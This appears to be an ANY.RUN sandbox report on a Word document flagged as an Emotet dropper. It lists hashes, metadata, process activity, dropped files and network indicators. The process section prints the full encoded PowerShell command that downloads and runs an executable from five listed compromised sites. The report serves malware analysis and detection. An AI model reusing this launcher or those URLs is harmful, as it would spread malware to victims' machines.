analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

1.doc

Full analysis: https://app.any.run/tasks/cca6ed35-451e-4306-a0b0-58ae65e860dd
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Malware Trends Tracker     >>>
Analysis date: May 20, 2019, 13:52:24
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
emotet-doc
emotet
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Legacy, Subject: Jewelery, Author: Vaughn Daniel, Comments: fuchsia best-of-breed knowledge user, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon May 20 13:33:00 2019, Last Saved Time/Date: Mon May 20 13:33:00 2019, Number of Pages: 1, Number of Words: 10, Number of Characters: 61, Security: 0
MD5:

409483CB111E3857B40807E885398857

SHA1:

15328E7A93F5F3E91B1E58EF54D934D519D694C2

SHA256:

195DB4DC248FA14B23FBCF63F959289A822689F25BDA203E521CFA0B11951936

SSDEEP:

3072:if77HUUUUUUUUUUUUUUUUUUUTkOQePu5U8qisQvQTo7b8SZYpl92NP4:if77HUUUUUUUUUUUUUUUUUUUT52VxsQ2

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    No malicious indicators.

  • SUSPICIOUS

    • Executed via WMI

      • powershell.exe (PID: 1260)

    • PowerShell script executed

      • powershell.exe (PID: 1260)

    • Creates files in the user directory

      • powershell.exe (PID: 1260)

  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2860)

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2860)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
Title: Legacy
Subject: Jewelery
Author: Vaughn Daniel
Keywords: -
Comments: fuchsia best-of-breed knowledge user
Template: Normal.dotm
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2019:05:20 12:33:00
ModifyDate: 2019:05:20 12:33:00
Pages: 1
Words: 10
Characters: 61
Security: None
CodePage: Windows Latin 1 (Western European)
Company: Schulist Inc
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 70
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
Manager: Kozey
No data.
screenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
36
Monitored processes
2
Malicious processes
0
Suspicious processes
1

Behavior graph

Click at the process to see the details
start winword.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
2860"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\1.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
1260powershell -ExecutionPolicy bypass -WindowStyle Hidden -noprofile -e JABxADcANABfADkAOAA0ADQAPQAnAHYAMgBfADkAMQAyACcAOwAkAGgANAAwADQAMwA4ADIAMwAgAD0AIAAnADcAMAA0ACcAOwAkAG4AMgAwADIAXwA5AD0AJwBLADAANQAzADAANAAyADUAJwA7ACQARAA0ADgAMwA3ADIAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAGgANAAwADQAMwA4ADIAMwArACcALgBlAHgAZQAnADsAJABIADYAXwBfADQAMAAxADEAPQAnAEUAMwAxAF8AOAAwADcAJwA7ACQAdwA5AF8AXwAxADUAOQA9AC4AKAAnAG4AZQB3AC0AJwArACcAbwAnACsAJwBiAGoAZQBjAHQAJwApACAATgBFAFQALgB3AEUAYgBgAGMAbABpAGAARQBgAE4AdAA7ACQAegA5ADEANgAwADUANgA3AD0AJwBoAHQAdABwADoALwAvAHQAbwBuAGcAZABhAGkAZgBwAHQALgBuAGUAdAAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAGgAeQBsAEsATABkAEoAVwBPAGgALwBAAGgAdAB0AHAAOgAvAC8AZQAtAHMAYQBsAGEAbQBwAHIAbwAuAGMAbwBtAC8AcwBhAHMAbgBlAGsAYQB0AC4AYwBvAG0ALwBhAHcAYwAyADYAMAAxAGIAXwBrAGYAOQA1AHUAbABkAHkANAAtADMANgAvAEAAaAB0AHQAcAA6AC8ALwBmAGkAbAB0AG8ALgBtAGwALwBjAGcAaQAtAGIAaQBuAC8AYQBNAHEAcQB1AEUAcwBRAHcALwBAAGgAdAB0AHAAOgAvAC8AcQBwAGQAaQBnAGkAdABlAGMAaAAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AeABtAHQANgBrAHUANQA5AHAAbABfADgANgBiAHQAOABmAHYALQA3ADMAOQAxADkAOAAwADMALwBAAGgAdAB0AHAAOgAvAC8AbwBtAGUAcwB0AHIAZQBtAGEAcgBjAGUAbgBlAGkAcgBvAC4AYwBvAG0ALgBiAHIALwB3AHAALQBpAG4AYwBsAHUAZABlAHMALwBjAGcAZQB5AF8AdgBwADgANgA3AHMAMgAzADgALQAxADcALwAnAC4AUwBwAEwAaQBUACgAJwBAACcAKQA7ACQAVgA1ADMANwBfADIANQBfAD0AJwByADkANAA4ADMANwAnADsAZgBvAHIAZQBhAGMAaAAoACQAQgA1ADEANwBfADMAIABpAG4AIAAkAHoAOQAxADYAMAA1ADYANwApAHsAdAByAHkAewAkAHcAOQBfAF8AMQA1ADkALgBkAE8AVwBuAGwAbwBBAEQARgBJAEwARQAoACQAQgA1ADEANwBfADMALAAgACQARAA0ADgAMwA3ADIAKQA7ACQAcgAwADEAMgAwADMAPQAnAHoAMAA1ADcAXwA5ADUAJwA7AEkAZgAgACgAKAAuACgAJwBHACcAKwAnAGUAdAAtACcAKwAnAEkAdABlAG0AJwApACAAJABEADQAOAAzADcAMgApAC4AbABFAE4AZwBUAGgAIAAtAGcAZQAgADIAOAA2ADcANQApACAAewAuACgAJwBJAG4AdgBvACcAKwAnAGsAZQAnACsAJwAtAEkAdABlACcAKwAnAG0AJwApACAAJABEADQAOAAzADcAMgA7ACQAegAwADEAOQAwADAAMQA9ACcAZgA4ADcAMAA1ADcANwAnADsAYgByAGUAYQBrADsAJAB3ADQANgBfADAANAAyADYAPQAnAEUAMQA0AF8AOAA4ADcAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAQwBfADIAMgBfADcAPQAnAFMAXwAxAF8ANQAxADcANgAnAA==C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 341
Read events
878
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
0
Unknown types
7

Dropped files

PID
Process
Filename
Type
2860WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVREFC.tmp.cvr
MD5:
SHA256:
1260powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\L3HN399D5LI9DT97VBDW.temp
MD5:
SHA256:
2860WINWORD.EXEC:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exdtlb
MD5:92B0DFEBC673EAE6FFFDB3939444BE62
SHA256:10A1EDD0BEFE7D3752E50B1DE44482C2D904371398E27DD90B057D7F7BAB7EBC
1260powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:16D0FD6E07266B2C15A9D7BC6623F506
SHA256:833367DC50386D139010182CEDE41B4D055F8D463626EC4005652528B3E0871B
2860WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:7574C177E7BDD138E57A6EACB5B767BE
SHA256:12EC815F7864455230B792E07F99945D24D24DE88D1E0ABF235AB71A5B2495A4
2860WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8EB5F286.wmfwmf
MD5:2B75703025E1594165C3BA64F23C4D1B
SHA256:9E52DF69287B303524E98B21B99C9097E1D8F390A2D92020FE76BAB6E5372B5C
2860WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\87C15859.wmfwmf
MD5:6FA521F2A2CBACBA0EB9D8C40E4701EB
SHA256:B161E62C80C5411AD3105C6BA78D01FB016323373F569D773E47BF0AAC18B0DC
2860WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8B273BB8.wmfwmf
MD5:8134F22E059B03F1BC6CB2C327B02487
SHA256:0B7BFBF021DFE29DF63D80AAE5291164D6747AC5A68A3646317533FF9EAB7C69
2860WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\63D7DBD3.wmfwmf
MD5:2DA88F0FE936F3B12CB340EACF81B8A6
SHA256:9EAB3E3621515F38E42BAA52ACD22C462B7E42D59BBC2693FD4316F2BD5514E1
1260powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF121ab4.TMPbinary
MD5:16D0FD6E07266B2C15A9D7BC6623F506
SHA256:833367DC50386D139010182CEDE41B4D055F8D463626EC4005652528B3E0871B
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
5
TCP/UDP connections
5
DNS requests
5
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
1260
powershell.exe
GET
404
103.253.212.121:80
http://e-salampro.com/sasnekat.com/awc2601b_kf95uldy4-36/
ID
xml
345 b
unknown
1260
powershell.exe
GET
404
89.44.32.201:80
http://filto.ml/cgi-bin/aMqquEsQw/
RO
xml
345 b
suspicious
1260
powershell.exe
GET
404
103.58.148.214:80
http://qpdigitech.com/wp-admin/xmt6ku59pl_86bt8fv-73919803/
TH
xml
345 b
malicious
1260
powershell.exe
GET
404
201.73.143.108:80
http://omestremarceneiro.com.br/wp-includes/cgey_vp867s238-17/
BR
xml
345 b
suspicious
1260
powershell.exe
GET
404
203.113.174.46:80
http://tongdaifpt.net/wp-includes/hylKLdJWOh/
VN
xml
345 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
1260
powershell.exe
203.113.174.46:80
tongdaifpt.net
Viettel Corporation
VN
malicious
1260
powershell.exe
89.44.32.201:80
filto.ml
Xt Global Networks Ltd.
RO
suspicious
1260
powershell.exe
103.253.212.121:80
e-salampro.com
Rumahweb Indonesia CV.
ID
unknown
1260
powershell.exe
103.58.148.214:80
qpdigitech.com
DE-CORP
TH
malicious
1260
powershell.exe
201.73.143.108:80
omestremarceneiro.com.br
CLARO S.A.
BR
unknown

DNS requests

Domain
IP
Reputation
tongdaifpt.net
  • 203.113.174.46
malicious
e-salampro.com
  • 103.253.212.121
unknown
filto.ml
  • 89.44.32.201
suspicious
qpdigitech.com
  • 103.58.148.214
malicious
omestremarceneiro.com.br
  • 201.73.143.108
suspicious

Threats

PID
Process
Class
Message
Potentially Bad Traffic
ET INFO DNS Query for Suspicious .ml Domain
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
1.doc